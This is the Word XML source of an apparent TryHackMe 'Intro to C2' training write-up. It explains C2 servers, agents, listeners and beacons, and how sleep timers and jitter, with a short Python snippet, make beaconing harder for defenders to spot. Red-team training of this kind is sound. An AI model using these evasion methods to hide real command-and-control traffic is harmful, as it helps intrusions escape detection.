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5F" w:rsidRPr="00FC648D" w:rsidRDefault="003B625F" w:rsidP="003B625F">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve">TRY HACK ME: </w:t>
      </w:r>
      <w:r w:rsidR="007D1424">
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t>Intro to C2</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
          <w:sz w:val="48"/>
          <w:szCs w:val="48"/>
        </w:rPr>
        <w:t xml:space="preserve"> Write-Up </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B625F" w:rsidRDefault="00511CE4" w:rsidP="003B625F">
      <w:pPr>
        <w:jc w:val="center"/>
      </w:pPr>
      <w:r w:rsidRPr="00511CE4">
        <w:rPr>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="5731510" cy="519120"/>
            <wp:effectExtent l="0" t="0" r="2540" b="0"/>
            <wp:docPr id="2" name="Picture 2" descr="C:\Users\shefali\Pictures\THM\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fali\Pictures\THM\1C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9120"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="000A3FEB" w:rsidRDefault="00AF4210" w:rsidP="003B625F">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AF4210">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 1 Introduction </w:t>
      </w:r>
      <w:r w:rsidR="003B625F">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Room Objectives</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In this room, we will learn about Command and Control Frameworks in-depth to gain a better underst</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>anding of the following topics:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    How a Command and Control Framework operates</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    The various components that you may use.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    How to set up a basic Command and Control Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    Use Armitage or </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Metasploit</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> to gain familiarity with a Command and Control Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    How to administer a Command and Control Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    OPSEC Considerations while administering a Command and Control Framework</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="003B625F" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="007215E7">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="007215E7">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    And much more!</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00962E3B" w:rsidRDefault="00962E3B" w:rsidP="00962E3B">
      <w:pPr>
        <w:rPr>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00100AD6">
        <w:rPr>
          <w:b/>
        </w:rPr>
        <w:t>Answer to the questions of this section-</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00053FD6" w:rsidRDefault="007215E7" w:rsidP="00962E3B">
      <w:r>
        <w:t>No Answer needed</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007215E7" w:rsidRPr="007215E7" w:rsidRDefault="007215E7" w:rsidP="00962E3B"/>
    <w:p w:rsidR="00D22D2A" w:rsidRDefault="004925FD" w:rsidP="00D22D2A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004925FD">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Task 2 Command and Control Framework Structure </w:t>
      </w:r>
      <w:r w:rsidR="008E7C34">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>–</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRDefault="00505F3B" w:rsidP="00505F3B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505F3B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
          <w:noProof/>
          <w:lang w:eastAsia="en-IN"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3190875" cy="1743075"/>
            <wp:effectExtent l="0" t="0" r="9525" b="9525"/>
            <wp:docPr id="3" name="Picture 3" descr="C:\Users\shefali\Pictures\THM\2.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fali\Pictures\THM\2.1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743075"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                    <a:noFill/>
                    <a:ln>
                      <a:noFill/>
                    </a:ln>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="00505F3B" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505F3B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Command and Control Structure</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00505F3B" w:rsidRDefault="00505F3B" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>C2 Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="00505F3B" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>In order to understand a Command and Control framework, we must first start by understanding the various components of a C2 server. Let’s start with the most essential component - The C2 Server itself. The C2 Server serves as a hub for agents to call back to. Agents will periodically reach out to the C2 server and wait for the operator’s commands.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00D91EF4" w:rsidRDefault="00D91EF4" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="00505F3B" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00505F3B">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Agents / Payloads</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="009B3428" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>An agent is a program generated by the C2 framework that calls back to a listener on a C2 server. Most of the time, this agent enables special functionality compared to a standard reverse shell. Most C2 Frameworks implement pseudo commands to make the C2 Operator’s life easier. Some examples of this may be a pseudo command to Download or Upload a file onto the system. It’s important to know that agents can be highly configurable, with adjustments on the timing of how often C2 Agents beacon out to a Listener on a C2 Server and much more.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="001C420C" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C420C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Listeners</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="009B3428" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">On the most basic level, a listener is an application running on the C2 server that waits for a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>callback</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> over a specific port or protocol. Some examples of this are DNS, HTTP, and or HTTPS.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRPr="001C420C" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001C420C">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Beacons</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009B3428" w:rsidRDefault="009B3428" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="009B3428">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A Beacon is the process of a C2 Agent calling back to the listener running on a C2 Server</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001C420C" w:rsidRDefault="001C420C" w:rsidP="009B3428">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="00EE0F64" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0F64">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t xml:space="preserve">Obfuscating Agent </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00EE0F64">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Callbacks</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="00EE0F64" w:rsidRDefault="00EE0F64" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00EE0F64">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Sleep Timers</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>One key thing that some security analysts, anti-virus, and next-generation firewalls look for when attempting to identify Command and Control traffic is beaconing and the rate at which a device beacons out to a C2 server. Let’s say a firewall obse</w:t>
      </w:r>
      <w:r w:rsidR="00EE0F64">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>rved traffic that looks like so</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:05.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 2s, 33 packets sent, 10:00:10.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:15.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 1s, 33 packets sent, 10:00:20.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:25.000</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>A pattern is starting to form. The agent beacons out every 5 seconds; this means that it has a sleep timer of 5 seconds.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="00EE0F64" w:rsidRDefault="00EE0F64" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
          <w:b/>
        </w:rPr>
        <w:t>Jitter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Jitter takes the sleep timer and adds some variation to it; our C2 beaconing may now exhibit a strange pattern that may show activity tha</w:t>
      </w:r>
      <w:r w:rsidR="00EE0F64">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t is closer to an average user:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:03.580</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 2s, 33 packets sent, 10:00:13.213</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:14.912</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 1s, 33 packets sent, 10:00:23.444</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve">    TCP/443 - Session Duration 3s, 55 packets sent, 10:00:27.182</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>The beaconing is now set at a semi-irregular pattern that makes it slightly more difficult to identify among regular user traffic. In more advanced C2 frameworks, it may be possible to alter various other parameters, like “File” jitter or adding junk data to the payload or files being transmitted to make it seem larger than it actually is.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>Sample Python3 co</w:t>
      </w:r>
      <w:r w:rsidR="004D044E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>de for Jitter may look like so:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="004D044E" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>import</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> random</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="004D044E" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = 60</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>jitter</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>random.randin</w:t>
      </w:r>
      <w:r w:rsidR="004D044E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>t</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidR="004D044E">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>(-30,30)</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="00433E80" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>sleep</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> = sleep + jitter</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="001253A2" w:rsidRPr="001253A2" w:rsidRDefault="001253A2" w:rsidP="001253A2">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>It's important to note that this is a fundamental example</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t>,  but</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="001253A2">
        <w:rPr>
          <w:rFonts w:cs="Times New Roman"/>
        </w:rPr>
        <w:t xml:space="preserve"> it can be much more math-heavy, setting upper bounds and lower bounds, taking percentages of last sleep, and building on from there. Because this is an introduction room, we will spare you a complicated formula.</w:t>
      </w:r>
    </w:p>
